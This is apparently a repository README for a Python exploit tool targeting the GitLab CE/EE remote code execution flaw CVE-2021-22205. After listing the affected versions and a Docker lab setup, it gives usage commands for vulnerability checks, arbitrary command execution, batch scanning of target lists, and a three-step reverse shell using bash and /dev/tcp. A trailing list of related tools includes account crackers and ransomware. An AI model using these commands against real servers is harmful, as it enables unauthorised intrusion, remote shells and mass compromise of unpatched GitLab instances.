CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Vuln Product

Gitlab CE/EE < 13.10.3
Gitlab CE/EE < 13.9.6
Gitlab CE/EE < 13.8.8

Environment

export GITLAB_HOME=/srv/gitlab

sudo docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0

Vunl Check

Basic usage

python3 CVE-2021-2205.py

Vuln check

python3 CVE-2021-2205.py -v true -t http://gitlab.example.com

command execute

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"

batch scan

python3 CVE-2021-2205.py -s true -f target.txt

Reserve Shell

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"

Reference

https://github.com/mr-r3bot/Gitlab-CVE-2021-22205

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

CVE-2021-22205& GitLab CE/EE RCE

Related tags

Overview

Vuln Impact

Vuln Product

Environment

Vunl Check

Basic usage

Vuln check

command execute

batch scan

Reserve Shell

Reference

Owner

Al1ex

Archive-Crack - A Tools for crack file archive

log4j burp scanner

A simple python script for hosting a Snowflake Proxy in your python program or with it's standalone cli

Exploiting CVE-2021-44228 in vCenter for remote code execution and more

FBGen is simple facebook user based wordlist generator using Username/ID and cookie.

Experimental musig2 python code, not for production use!

A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

Exploit tool for Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability

Hacktricks - Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

Port scanning tool that uses Python3. Created by Noble Wilson

SpiderFoot automates OSINT collection so that you can focus on analysis.

The Linux defender anti-virus software ported to work on CentOS Linux.

Lightweight and beneficial Dependency Injection plugin for apscheduler

Just another script for automatize boolean-based blind SQL injections.

TOOLS CRACK FACEBOOK

A Telegram Bot to force users to join a specific channel before sending messages in a group.

SARA - Simple Android Ransomware Attack

Receive notifications/alerts on the most recent disclosed CVE's.

a cool, easily usable and customisable subdomains scanner

version de mi tool de kali linux para miertuxzzzz digo, termux >:)